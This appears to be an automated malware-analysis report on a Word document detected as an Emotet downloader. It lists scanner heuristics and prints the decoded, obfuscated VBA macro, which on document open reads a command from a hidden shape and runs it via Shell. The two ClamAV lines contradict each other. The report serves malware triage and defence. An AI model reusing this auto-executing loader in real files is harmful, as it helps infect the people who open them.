Verdict: MALICIOUS
Risk Score: 232
Heuristics: 8
- ClamAV: Doc.Downloader.Emotet-6872607-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6872607-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:
  End Select FizwCN = Array(fZMRBkd, tZzvWjr, KkXQR, [Interaction].Shell(lKbhGbSro, PSZWbpPWaFc), fdnjEGt) Select Case UQwXdLFraBiNWrmjpbsibvro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script:
  Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6023 bytes |

SHA-256: 4b307751bdaeeb84bda3ba6bf264ba6aa48634ee4ee07710ffd8cdf2cb855ece

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 128 of 167 identifiers look randomly generated (e.g. 'UQwXdLFraBiNWrmjpbsibvro'), consistent with name-mangling obfuscation.
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "jWKEYwOmE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
Select Case cRBuhMZQwnQwuwFhVjlA
Case 107945462
bNhdTzHZEcMahtT = 155223412
zDHOkjvzaJLikSlPWpn = 83361385
saJXjomUOMOwEl = ChrB(327660076 / ChrB(59848184))
qhmitpvuUJbLKDfKXGdzrBs = fLzwjfhnGfwGZZw
Case 239942358
cOiKJDJjnjfULzpo = 195813242
hszOocnEiEYlwHsjPnNwWIoN = 296612984
BSvjJSwaQsOOaCXEYEKCiXcb = ChrB(236484674 / ChrB(14649624))
fdZElVpaUJzvGpXqAVA = 85414782
End Select
Select Case dohUGPRGacOKwtG
Case 141517768
EtziDwZLKZKuRBRBz = 339588959
bVzchnwcKUhDXv = 298784711
vRZZqIIvqGMJawJAuCtuE = ChrB(118078005 / ChrB(118637707))
HWPqcVnwXRWjXZOTMElaanBN = hJUBwfdzdSTtSSUT
Case 87320485
JZZcUoaiAjrUUUBfvMSzZl = 297360078
uHuaulQGNBrnlEpfaPfwI = 60183079
wrmXIBPMYjqiNuAoOPkGTdOu = ChrB(286306855 / ChrB(153545002))
WJFwblJwiHOIFzoTGvVbla = 179693590
End Select
Select Case BWjYXoIuQastALVsJpOwV
Case 195439762
KOaXMRRjnEuIlSzXMo = 261141773
oLpdOkWZhdHPXAWJzQw = 188863965
qFoFDkaLRBIiFhzZwIburBKw = ChrB(205167950 / ChrB(244665194))
woavrKYzGBXLzwNPbwhRT = kBIUhHouraSziXrGRX
Case 213926330
sXYzcwiljwwTRYEYnXdRI = 77541942
zsARpXVhJljiMcK = 290614509
cDLtcziFTTSttOahObEcj = ChrB(267644015 / ChrB(91381440))
QohhurvcfuoFAPUtR = 81460282
End Select
Select Case IawdGzPNNRaMlATvPM
Case 203398603
FZUppkjOObNjfphtjAS = 331934804
cnWpLozswsPFARiGJ = 265819449
RAwlEuhwTaMOujKcmw = ChrB(341626206 / ChrB(192189494))
hVSjzbfXwmZMwjNiBRuirfSj = VYpowHJLYkifBHTBZUnm
Case 11713610
zwwkhFwFBDiGcCpiCfQBYwjw = 340542620
bdSLfzbXZsqLaEMT = 227122549
wvfQLqSIVAZCNzlXdVn = ChrB(276367034 / ChrB(160665093))
iEdwsqELoEOIBEiLRbtWb = 181148815
End Select
Select Case dRTRPdiattKInU
Case 315202945
COVjzzLCZOvSzI = 305663429
uChiirncYqHWqbKEaEmXhr = 27680451
GQrBiQalzUOlmQSLbtIH = ChrB(273699605 / ChrB(269691638))
wEqsvVWHDzAYRzlt = QWXWNZRJlbwoizr
Case 113419727
twrYfPcMKnlsBLp = 337906739
rTRplfZiJuaTUA = 63417123
MGpCjkGvJClfQkP = ChrB(42666454 / ChrB(271616126))
GYzPHRSpVVCtqmckpFAwQ = 42759450
End Select
Set jjttSZi = Shapes("pRfhzJGiduUwd").TextFrame
Select Case pmiTNlUvZiNZALWSuKAHHMC
Case 13061260
ijuHlzSBdjlRXU = 196571017
wRwfjaBAZfTQPmcjcPjFa = 258678314
iuYXblAXpWYLvEWXDfuiFj = ChrB(14120224 / ChrB(251460836))
GCoHlYIJcUkHDZPYHdtqahi = rjajEizsmjViLQE
Case 329037605
CSjlPzFfJzDIvQZXi = 102537195
wcEuWsVXDjMrYva = 163216202
uUcjUBvkukqPwLdAz = ChrB(341277615 / ChrB(256870060))
YNtucCwzGiMVrLcNnYdbJJbI = 204168429
End Select
lKbhGbSro = jjttSZi.ContainingRange + biDSCwi + jqZwnb + VYliPN + dNPEQhQV + LoPlkP + FVLZLiL + iWmTd + kPLIoH + cmavqSh + iHEKmdk
Select Case RWlCVaZkLQsFQLaOUG
Case 207982450
ZsoTlmuJlzmMFzc = 296547916
GUuQckiojMurUJ = 91575631
iwZiRRifPwOifAQ = ChrB(228310081 / ChrB(219178115))
OmkowHFfCaARRoYF = DDKmplPAiWEJivLKJub
Case 145743376
ARcmPHiwjZFZaNfWXYAVnSl = 4477543
TfpHHtzjjDlhAailCz = 318782903
kHhjomVbADhfcRvbprYjHprK = ChrB(299833146 / ChrB(268439748))
wVkkUpAlLzJTVXVijV = 40818528
End Select
Select Case PSNHQiDvYPnVIF
Case 262869949
izQbDncsRRSooDJ = 29206015
HXozjXEjYuYmaQEDqrXDdwcp = 138857395
wMPHVGiXAhzHBbLsftDGqA = ChrB(92091128 / ChrB(247413817))
LlATLvwcqYsURYSDCQWDjqvs = QimPzwwdJKUhEpmAiLDSXO
Case 136299411
CojriNVqIhuMLNqZuqHOz = 144912673
bjCFisZOCOBMLOGvwoiZWuap = 110847353
dYjHGnjpIIfIqziTsw = ChrB(68459472 / ChrB(3871718))
KnvKZTwbjJNoKOBhuHOj = 140845901
End Select
Const PSZWbpPWaFc = 0
Select Case cshVMclRkiuujtHUOE
Case 186971842
RmCKfTFLIwWEBwijV = 148219983
ZsPKRmHUtDziTZb = 7395442
pXpsWaJmIptnOXwswDZCbk = ChrB(159507372 / ChrB(154652586))
LIKTCfauotzjNCSFXJwOhifz = UWCwOEwStLSwTFKSsaiBLl
Case 6524921
wDbbIRjcLhhJYwa = 268783445
OTqAGEDmwoEAwajVvBKdXJbi = 272361399
lXAuwzpBzRKGpzXpMdbcNG = ChrB(329442965 / ChrB(265565165))
uPLbErMKTSjlBsELwcSL = 273113457
End Select
Select Case GfzwURwKSFliwfPvFaGhiqwQ
Case 230770342
LoQozQBWDYphBJpuFZwAbpfU = 283416193
UNSQiiPZFItdGVhacq = 38843608
ZzrjlXUiTWIvzbvnEmp = ChrB(46016991 / ChrB(119273315))
DhBbTbSBNoOSwXWifLO = FjzzjiZtVpBwGztJiJEt
Case 105346625
IUjidYRVHislWTiDu = 270970740
ZfXnQLAdMzVGUQ = 261153869
fQBABcAiWGUaabfOPrq = ChrB(252113943 / ChrB(243165323))
QSduEWlXYVisDmtpAwfp = 114381258
End Select
FizwCN = Array(fZMRBkd, tZzvWjr, KkXQR, [Interaction].Shell(lKbhGbSro, PSZWbpPWaFc), fdnjEGt)
Select Case UQwXdLFraBiNWrmjpbsibvro
Case 150309822
DXJsavOEbjrHiDSuBiiKFq = 325633650
GzBYXYZKBoIihhaiz = 120080410
FphwpMjuMJMjNZrmd = ChrB(308214209 / ChrB(271576289))
CHhGqvkMTEvKnZrdZALM = iNAoFuIquzoJlOwHaGubUaI
Case 92578796
wniNNcjcpXtjSl = 1018641
WYHHABLsVwuRlWEFmmI = 50917588
chUEhvqEaIVuzzBAGAu = ChrB(180407467 / ChrB(270940190))
PiSrTToufcsBurmCTFVoupY = 150288247
End Select
Select Case AjmNpFZoJozLawLmdALU
Case 188784894
OGGTlYGfSQBIwuFX = 265218997
UNZGwbpwimNNJKBnUf = 43049497
UAhdVhJRAQhGMrzOnH = ChrB(70437324 / ChrB(202167107))
pqURFHrGJaZQRATjvlOS = wSEHBSLnzNVbsiKNLQa
Case 121335806
rqHpuqfirWvMFtYP = 70589910
ofTJMEoZVJSkUo = 341911421
FbzRGbfEHrZPmlmz = ChrB(6787375 / ChrB(82499081))
mqhiCBUUWQHBHMrowStzM = 3522519
End Select
Select Case MfUmVsqcEYakmsbr
Case 237620261
EfSjipitkNnEMGcjNiaTY = 162338398
mpqlfXhZYtuusvdAfEcIcoz = 77462566
HCiwQQKjljtoEDVDnP = ChrB(73153937 / ChrB(122071429))
kokdvPvQRwpiQXUC = HcjOGPjMaBGFoYotJXOu
Case 125969357
BPPUiDKnfBALHijwdY = 1872205
UNoLcZAlHAFHJmaUw = 253253867
jCnVFEdRGKMtquBBnaErI = ChrB(18263467 / ChrB(165162670))
ivtBVIOzrrUPjsjGwIua = 308435471
End Select
End Sub